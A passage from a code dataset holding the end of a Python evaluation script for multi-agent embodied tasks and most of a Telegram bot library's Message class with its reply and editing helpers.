'h_agent':\n agent.reset(goal_objects = info['goal_description'], output_dir = os.path.join(self.output_dir, str(episode)), env_api = curr_api, agent_color = info['agent_colors'][id], agent_id = id, gt_mask = self.gt_mask, save_img = self.save_img)\n elif agent.agent_type == 'lm_agent':\n agent.reset(obs = state[str(id)], goal_objects = info['goal_description'], output_dir = os.path.join(self.output_dir, str(episode)), env_api = curr_api, agent_color = info['agent_colors'][id], agent_id = id, rooms_name=info['rooms_name'], gt_mask = self.gt_mask, save_img = self.save_img)\n else:\n raise Exception(f\"{agent.agent_type} not available\")\n else:\n agent.reset(output_dir = os.path.join(self.output_dir, str(episode)))\n self.logger.info(f\"Environment Reset. Took {time.time() - start_time} secs\")\n local_finish = self.env.check_goal()\n done = False\n step_num = 0\n local_reward = 0.0\n while not done:\n step_num += 1\n actions = {}\n if self.save_img: self.env.save_images(os.path.join(self.output_dir, str(episode), 'Images'))\n for agent_id, agent in enumerate(agents):\n actions[str(agent_id)] = agent.act(state[str(agent_id)])\n state, reward, done, info = self.env.step(actions)\n local_reward += reward\n local_finish = self.env.check_goal()\n self.logger.info(f\"Executing step {step_num} for episode: {episode}, actions: {actions}, finish: {local_finish}, frame: {self.env.num_frames}\")\n if done:\n break\n total_finish += local_finish[0] / local_finish[1]\n result = {\n \"finish\": local_finish[0],\n \"total\": local_finish[1],\n }\n with open(os.path.join(self.output_dir, str(episode), 'result_episode.json'), 'w') as f:\n json.dump(result, f)\n results[episode] = result\n avg_finish = total_finish / num_eval_episodes\n results = {\n \"episode_results\": results,\n \"avg_finish\": avg_finish\n }\n with open(os.path.join(self.output_dir, 'eval_result.json'), 'w') as f:\n json.dump(results, f, indent=4)\n self.logger.info(f'eval done, avg transport rate {avg_finish}')\n self.logger.info('time: {}'.format(time.time() - start))\n return avg_finish\n\n def close(self):\n self.env.close()\n\ndef init_logs(output_dir, name = 'simple_example'):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler(os.path.join(output_dir, \"output.log\"))\n fh.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(ch)\n return logger\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--output_dir\", type=str, default=\"results\")\n parser.add_argument(\"--experiment_name\", type = str, default = \"try\")\n parser.add_argument(\"--run_id\", type=str, default='run_0')\n parser.add_argument(\"--data_path\", type=str, default=\"test_env.json\")\n parser.add_argument(\"--data_prefix\", type=str, default=\"dataset/dataset_train/\")\n parser.add_argument(\"--port\", default=1071, type=int)\n parser.add_argument(\"--agents\", nargs='+', type=str, default=(\"h_agent\",))\n parser.add_argument(\"--eval_episodes\", nargs='+', default=(-1,), type=int, help=\"which episodes to evaluate on\")\n parser.add_argument(\"--max_frames\", default=3000, type=int, help=\"max frames per episode\")\n parser.add_argument(\"--no_launch_build\", action='store_true')\n parser.add_argument(\"--communication\", action='store_true')\n parser.add_argument(\"--debug\", action='store_true')\n parser.add_argument(\"--no_gt_mask\", action='store_true')\n # LLM parameters\n parser.add_argument('--source', default='openai',\n choices=['hf', 'openai'],\n help='openai API or load huggingface models')\n parser.add_argument('--lm_id', default='gpt-3.5-turbo',\n help='name for openai engine or huggingface model name/path')\n parser.add_argument('--prompt_template_path', default='LLM/prompt_single.csv',\n help='path to prompt template file')\n parser.add_argument(\"--t\", default=0.7, type=float)\n parser.add_argument(\"--top_p\", default=1.0, type=float)\n parser.add_argument(\"--max_tokens\", default=64, type=int)\n parser.add_argument(\"--n\", default=1, type=int)\n parser.add_argument(\"--logprobs\", default=1, type=int)\n parser.add_argument(\"--cot\", action='store_true', help=\"use chain-of-thought prompt\")\n parser.add_argument(\"--echo\", action='store_true', help=\"to include prompt in the outputs\")\n parser.add_argument(\"--screen_size\", default=512, type=int)\n parser.add_argument(\"--no_save_img\", action='store_true', help=\"do not save images\", default=False)\n args = parser.parse_args()\n\n args.number_of_agents = len(args.agents)\n os.makedirs(args.output_dir, exist_ok = True)\n args.output_dir = os.path.join(args.output_dir, args.experiment_name)\n os.makedirs(args.output_dir, exist_ok = True)\n args.output_dir = os.path.join(args.output_dir, args.run_id)\n os.makedirs(args.output_dir, exist_ok = True)\n logger = init_logs(args.output_dir)\n\n challenge = Challenge(logger, args.port, args.data_path, args.output_dir, args.number_of_agents, args.max_frames, not args.no_launch_build, screen_size = args.screen_size, data_prefix=args.data_prefix, gt_mask = not args.no_gt_mask, save_img = not args.no_save_img)\n agents = []\n for i, agent in enumerate(args.agents):\n if agent == 'h_agent':\n agents.append(H_agent(i, logger, args.max_frames, args.output_dir))\n elif agent == 'lm_agent':\n agents.append(lm_agent(i, logger, args.max_frames, args, args.output_dir))\n else:\n pass\n try:\n challenge.submit(agents, logger, args.eval_episodes)\n finally:\n challenge.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"UMass-Foundation-Model/Co-LLM-Agents","sub_path":"tdw_mat/tdw-gym/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"48"} +{"seq_id":"8227600133","text":"import datetime\nimport functools\nimport sys\nimport typing\n\nfrom . import base\nfrom . import fields\nfrom .animation import Animation\nfrom .audio import Audio\nfrom .chat import Chat\nfrom .contact import Contact\nfrom .document import Document\nfrom .game import Game\nfrom .invoice import Invoice\nfrom .location import Location\nfrom .message_entity import MessageEntity\nfrom .passport_data import PassportData\nfrom .photo_size import PhotoSize\nfrom .sticker import Sticker\nfrom .successful_payment import SuccessfulPayment\nfrom .user import User\nfrom .venue import Venue\nfrom .video import Video\nfrom .video_note import VideoNote\nfrom .voice import Voice\nfrom ..utils import helper\nfrom ..utils import markdown as md\n\n\nclass Message(base.TelegramObject):\n \"\"\"\n This object represents a message.\n\n https://core.telegram.org/bots/api#message\n \"\"\"\n message_id: base.Integer = fields.Field()\n from_user: User = fields.Field(alias='from', base=User)\n date: datetime.datetime = fields.DateTimeField()\n chat: Chat = fields.Field(base=Chat)\n forward_from: User = fields.Field(base=User)\n forward_from_chat: Chat = fields.Field(base=Chat)\n forward_from_message_id: base.Integer = fields.Field()\n forward_signature: base.String = fields.Field()\n forward_date: datetime.datetime = fields.DateTimeField()\n reply_to_message: 'Message' = fields.Field(base='Message')\n edit_date: datetime.datetime = fields.DateTimeField()\n media_group_id: base.String = fields.Field()\n author_signature: base.String = fields.Field()\n text: base.String = fields.Field()\n entities: typing.List[MessageEntity] = fields.ListField(base=MessageEntity)\n caption_entities: typing.List[MessageEntity] = fields.ListField(base=MessageEntity)\n audio: Audio = fields.Field(base=Audio)\n document: Document = fields.Field(base=Document)\n animation: Animation = fields.Field(base=Animation)\n game: Game = fields.Field(base=Game)\n photo: typing.List[PhotoSize] = fields.ListField(base=PhotoSize)\n sticker: Sticker = fields.Field(base=Sticker)\n video: Video = fields.Field(base=Video)\n voice: Voice = fields.Field(base=Voice)\n video_note: VideoNote = fields.Field(base=VideoNote)\n caption: base.String = fields.Field()\n contact: Contact = fields.Field(base=Contact)\n location: Location = fields.Field(base=Location)\n venue: Venue = fields.Field(base=Venue)\n new_chat_members: typing.List[User] = fields.ListField(base=User)\n left_chat_member: User = fields.Field(base=User)\n new_chat_title: base.String = fields.Field()\n new_chat_photo: typing.List[PhotoSize] = fields.ListField(base=PhotoSize)\n delete_chat_photo: base.Boolean = fields.Field()\n group_chat_created: base.Boolean = fields.Field()\n supergroup_chat_created: base.Boolean = fields.Field()\n channel_chat_created: base.Boolean = fields.Field()\n migrate_to_chat_id: base.Integer = fields.Field()\n migrate_from_chat_id: base.Integer = fields.Field()\n pinned_message: 'Message' = fields.Field(base='Message')\n invoice: Invoice = fields.Field(base=Invoice)\n successful_payment: SuccessfulPayment = fields.Field(base=SuccessfulPayment)\n connected_website: base.String = fields.Field()\n passport_data: PassportData = fields.Field(base=PassportData)\n\n @property\n @functools.lru_cache()\n def content_type(self):\n if self.text:\n return ContentType.TEXT[0]\n elif self.audio:\n return ContentType.AUDIO[0]\n elif self.animation:\n return ContentType.ANIMATION[0]\n elif self.document:\n return ContentType.DOCUMENT[0]\n elif self.game:\n return ContentType.GAME[0]\n elif self.photo:\n return ContentType.PHOTO[0]\n elif self.sticker:\n return ContentType.STICKER[0]\n elif self.video:\n return ContentType.VIDEO[0]\n elif self.video_note:\n return ContentType.VIDEO_NOTE[0]\n elif self.voice:\n return ContentType.VOICE[0]\n elif self.contact:\n return ContentType.CONTACT[0]\n elif self.venue:\n return ContentType.VENUE[0]\n elif self.location:\n return ContentType.LOCATION[0]\n elif self.new_chat_members:\n return ContentType.NEW_CHAT_MEMBERS[0]\n elif self.left_chat_member:\n return ContentType.LEFT_CHAT_MEMBER[0]\n elif self.invoice:\n return ContentType.INVOICE[0]\n elif self.successful_payment:\n return ContentType.SUCCESSFUL_PAYMENT[0]\n elif self.connected_website:\n return ContentType.CONNECTED_WEBSITE[0]\n elif self.migrate_from_chat_id:\n return ContentType.MIGRATE_FROM_CHAT_ID[0]\n elif self.migrate_to_chat_id:\n return ContentType.MIGRATE_TO_CHAT_ID[0]\n elif self.pinned_message:\n return ContentType.PINNED_MESSAGE[0]\n elif self.new_chat_title:\n return ContentType.NEW_CHAT_TITLE[0]\n elif self.new_chat_photo:\n return ContentType.NEW_CHAT_PHOTO[0]\n elif self.delete_chat_photo:\n return ContentType.DELETE_CHAT_PHOTO[0]\n elif self.group_chat_created:\n return ContentType.GROUP_CHAT_CREATED[0]\n elif self.passport_data:\n return ContentType.PASSPORT_DATA[0]\n else:\n return ContentType.UNKNOWN[0]\n\n def is_command(self):\n \"\"\"\n Check message text is command\n\n :return: bool\n \"\"\"\n return self.text and self.text.startswith('/')\n\n def get_full_command(self):\n \"\"\"\n Split command and args\n\n :return: tuple of (command, args)\n \"\"\"\n if self.is_command():\n command, _, args = self.text.partition(' ')\n return command, args\n\n def get_command(self, pure=False):\n \"\"\"\n Get command from message\n\n :return:\n \"\"\"\n command = self.get_full_command()\n if command:\n command = command[0]\n if pure:\n command, _, _ = command[1:].partition('@')\n return command\n\n def get_args(self):\n \"\"\"\n Get arguments\n\n :return:\n \"\"\"\n command = self.get_full_command()\n if command:\n return command[1].strip()\n\n def parse_entities(self, as_html=True):\n \"\"\"\n Text or caption formatted as HTML or Markdown.\n\n :return: str\n \"\"\"\n\n text = self.text or self.caption\n if text is None:\n raise TypeError(\"This message doesn't have any text.\")\n\n quote_fn = md.quote_html if as_html else md.escape_md\n\n if not self.entities:\n return quote_fn(text)\n\n if not sys.maxunicode == 0xffff:\n text = text.encode('utf-16-le')\n\n result = ''\n offset = 0\n\n for entity in sorted(self.entities, key=lambda item: item.offset):\n entity_text = entity.parse(text, as_html=as_html)\n\n if sys.maxunicode == 0xffff:\n part = text[offset:entity.offset]\n result += quote_fn(part) + entity_text\n else:\n part = text[offset * 2:entity.offset * 2]\n result += quote_fn(part.decode('utf-16-le')) + entity_text\n\n offset = entity.offset + entity.length\n\n if sys.maxunicode == 0xffff:\n part = text[offset:]\n result += quote_fn(part)\n else:\n part = text[offset * 2:]\n result += quote_fn(part.decode('utf-16-le'))\n\n return result\n\n @property\n def md_text(self) -> str:\n \"\"\"\n Text or caption formatted as markdown.\n\n :return: str\n \"\"\"\n return self.parse_entities(False)\n\n @property\n def html_text(self) -> str:\n \"\"\"\n Text or caption formatted as HTML\n\n :return: str\n \"\"\"\n return self.parse_entities()\n\n async def reply(self, text, parse_mode=None, disable_web_page_preview=None,\n disable_notification=None, reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Reply to this message\n\n :param text: str\n :param parse_mode: str\n :param disable_web_page_preview: bool\n :param disable_notification: bool\n :param reply_markup:\n :param reply: fill 'reply_to_message_id'\n :return: :class:`aiogram.types.Message`\n \"\"\"\n return await self.bot.send_message(chat_id=self.chat.id, text=text,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_photo(self, photo: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Use this method to send photos.\n\n Source: https://core.telegram.org/bots/api#sendphoto\n\n :param photo: Photo to send.\n :type photo: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Photo caption (may also be used when resending photos by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_photo(chat_id=self.chat.id, photo=photo, caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_audio(self, audio: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n duration: typing.Union[base.Integer, None] = None,\n performer: typing.Union[base.String, None] = None,\n title: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send audio files, if you want Telegram clients to display them in the music player.\n Your audio must be in the .mp3 format.\n\n For sending voice messages, use the sendVoice method instead.\n\n Source: https://core.telegram.org/bots/api#sendaudio\n\n :param audio: Audio file to send.\n :type audio: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Audio caption, 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param duration: Duration of the audio in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param performer: Performer\n :type performer: :obj:`typing.Union[base.String, None]`\n :param title: Track name\n :type title: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_audio(chat_id=self.chat.id,\n audio=audio,\n caption=caption,\n duration=duration,\n performer=performer,\n title=title,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_document(self, document: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send general files.\n\n Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.\n\n Source: https://core.telegram.org/bots/api#senddocument\n\n :param document: File to send.\n :type document: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Document caption (may also be used when resending documents by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply], None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_document(chat_id=self.chat.id,\n document=document,\n caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_video(self, video: typing.Union[base.InputFile, base.String],\n duration: typing.Union[base.Integer, None] = None,\n width: typing.Union[base.Integer, None] = None,\n height: typing.Union[base.Integer, None] = None,\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send video files, Telegram clients support mp4 videos\n (other formats may be sent as Document).\n\n Source: https://core.telegram.org/bots/api#sendvideo\n\n :param video: Video to send.\n :type video: :obj:`typing.Union[base.InputFile, base.String]`\n :param duration: Duration of sent video in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param width: Video width\n :type width: :obj:`typing.Union[base.Integer, None]`\n :param height: Video height\n :type height: :obj:`typing.Union[base.Integer, None]`\n :param caption: Video caption (may also be used when resending videos by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_video(chat_id=self.chat.id,\n video=video,\n duration=duration,\n width=width,\n height=height,\n caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_voice(self, voice: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n duration: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send audio files, if you want Telegram clients to display the file\n as a playable voice message.\n\n For this to work, your audio must be in an .ogg file encoded with OPUS\n (other formats may be sent as Audio or Document).\n\n Source: https://core.telegram.org/bots/api#sendvoice\n\n :param voice: Audio file to send.\n :type voice: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Voice message caption, 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param duration: Duration of the voice message in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_voice(chat_id=self.chat.id,\n voice=voice,\n caption=caption,\n duration=duration,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_video_note(self, video_note: typing.Union[base.InputFile, base.String],\n duration: typing.Union[base.Integer, None] = None,\n length: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n As of v.4.0, Telegram clients support rounded square mp4 videos of up to 1 minute long.\n Use this method to send video messages.\n\n Source: https://core.telegram.org/bots/api#sendvideonote\n\n :param video_note: Video note to send.\n :type video_note: :obj:`typing.Union[base.InputFile, base.String]`\n :param duration: Duration of sent video in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param length: Video width and height\n :type length: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_video_note(chat_id=self.chat.id,\n video_note=video_note,\n duration=duration,\n length=length,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_media_group(self, media: typing.Union['MediaGroup', typing.List],\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply=True) -> typing.List['Message']:\n \"\"\"\n Use this method to send a group of photos or videos as an album.\n\n Source: https://core.telegram.org/bots/api#sendmediagroup\n\n :param media: A JSON-serialized array describing photos and videos to be sent\n :type media: :obj:`typing.Union[types.MediaGroup, typing.List]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, an array of the sent Messages is returned.\n :rtype: typing.List[types.Message]\n \"\"\"\n return await self.bot.send_media_group(self.chat.id,\n media=media,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None)\n\n async def reply_location(self, latitude: base.Float,\n longitude: base.Float, live_period: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send point on the map.\n\n Source: https://core.telegram.org/bots/api#sendlocation\n\n :param latitude: Latitude of the location\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of the location\n :type longitude: :obj:`base.Float`\n :param live_period: Period in seconds for which the location will be updated\n :type live_period: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_location(chat_id=self.chat.id,\n latitude=latitude,\n longitude=longitude,\n live_period=live_period,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def edit_live_location(self, latitude: base.Float, longitude: base.Float,\n reply_markup=None) -> 'Message' or base.Boolean:\n \"\"\"\n Use this method to edit live location messages sent by the bot or via the bot (for inline bots).\n A location can be edited until its live_period expires or editing is explicitly disabled by a call\n to stopMessageLiveLocation.\n\n Source: https://core.telegram.org/bots/api#editmessagelivelocation\n\n :param latitude: Latitude of new location\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of new location\n :type longitude: :obj:`base.Float`\n :param reply_markup: A JSON-serialized object for a new inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if the edited message was sent by the bot, the edited Message is returned,\n otherwise True is returned.\n :rtype: :obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.edit_message_live_location(latitude=latitude, longitude=longitude,\n chat_id=self.chat.id, message_id=self.message_id,\n reply_markup=reply_markup)\n\n async def stop_live_location(self, reply_markup=None) -> 'Message' or base.Boolean:\n \"\"\"\n Use this method to stop updating a live location message sent by the bot or via the bot\n (for inline bots) before live_period expires.\n\n Source: https://core.telegram.org/bots/api#stopmessagelivelocation\n\n :param reply_markup: A JSON-serialized object for a new inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if the message was sent by the bot, the sent Message is returned,\n otherwise True is returned.\n :rtype: :obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.stop_message_live_location(chat_id=self.chat.id, message_id=self.message_id,\n reply_markup=reply_markup)\n\n async def send_venue(self, latitude: base.Float, longitude: base.Float, title: base.String, address: base.String,\n foursquare_id: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send information about a venue.\n\n Source: https://core.telegram.org/bots/api#sendvenue\n\n :param latitude: Latitude of the venue\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of the venue\n :type longitude: :obj:`base.Float`\n :param title: Name of the venue\n :type title: :obj:`base.String`\n :param address: Address of the venue\n :type address: :obj:`base.String`\n :param foursquare_id: Foursquare identifier of the venue\n :type foursquare_id: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_venue(chat_id=self.chat.id,\n latitude=latitude,\n longitude=longitude,\n title=title,\n address=address,\n foursquare_id=foursquare_id,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def send_contact(self, phone_number: base.String,\n first_name: base.String, last_name: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send phone contacts.\n\n Source: https://core.telegram.org/bots/api#sendcontact\n\n :param phone_number: Contact's phone number\n :type phone_number: :obj:`base.String`\n :param first_name: Contact's first name\n :type first_name: :obj:`base.String`\n :param last_name: Contact's last name\n :type last_name: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_contact(chat_id=self.chat.id,\n phone_number=phone_number,\n first_name=first_name, last_name=last_name,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def forward(self, chat_id, disable_notification=None) -> 'Message':\n \"\"\"\n Forward this message\n\n :param chat_id:\n :param disable_notification:\n :return:\n \"\"\"\n return await self.bot.forward_message(chat_id, self.chat.id, self.message_id, disable_notification)\n\n async def edit_text(self, text: base.String,\n parse_mode: typing.Union[base.String, None] = None,\n disable_web_page_preview: typing.Union[base.Boolean, None] = None,\n reply_markup=None):\n \"\"\"\n Use this method to edit text and game messages sent by the bot or via the bot (for inline bots).\n\n Source: https://core.telegram.org/bots/api#editmessagetext\n\n :param text: New text of the message\n :type text: :obj:`base.String`\n :param parse_mode: Send Markdown or HTML, if you want Telegram apps to show bold, italic,\n fixed-width text or inline URLs in your bot's message.\n :type parse_mode: :obj:`typing.Union[base.String, None]`\n :param disable_web_page_preview: Disables link previews for links in this message\n :type disable_web_page_preview: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: A JSON-serialized object for an inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if edited message is sent by the bot,\n the edited Message is returned, otherwise True is returned.\n :rtype: :obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.edit_message_text(text=text,\n chat_id=self.chat.id, message_id=self.message_id,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview,\n reply_markup=reply_markup)\n\n async def delete(self):\n \"\"\"\n Delete this message\n\n :return: bool\n \"\"\"\n return await self.bot.delete_message(self.chat.id, self.message_id)\n\n async def reply_sticker(self, sticker: typing.Union[base.InputFile, base.String],\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Use this method to send .webp stickers.\n\n Source: https://core.telegram.org/bots/api#sendsticker\n\n :param sticker: Sticker to send.\n :type sticker: :obj:`typing.Union[base.InputFile, base.String]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_sticker(chat_id=self.chat.id, sticker=sticker,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def pin(self, disable_notification: bool = False):\n \"\"\"\n Pin message\n\n :param disable_notification:\n :return:\n \"\"\"\n return await self.chat.pin_message(self.message_id, disable_notification)\n\n def __int__(self):\n return self.message_id\n\n\nclass ContentType(helper.Helper):\n \"\"\"\n List of message content types\n\n :key: TEXT\n :key: AUDIO\n :key: DOCUMENT\n :key: GAME\n :key: PHOTO\n :key: STICKER\n :key: VIDEO\n :key: VIDEO_NOTE\n :key: VOICE\n :key: CONTACT\n :key: LOCATION\n :key: VENUE\n :key: NEW_CHAT_MEMBERS\n :key: LEFT_CHAT_MEMBER\n :key: INVOICE\n :key: SUCCESSFUL_PAYMENT\n :key: CONNECTED_WEBSITE\n :key: MIGRATE_TO_CHAT_ID\n :key: MIGRATE_FROM_CHAT_ID\n :key: UNKNOWN\n :key: ANY\n \"\"\"\n mode = helper.HelperMode.snake_case\n\n TEXT = 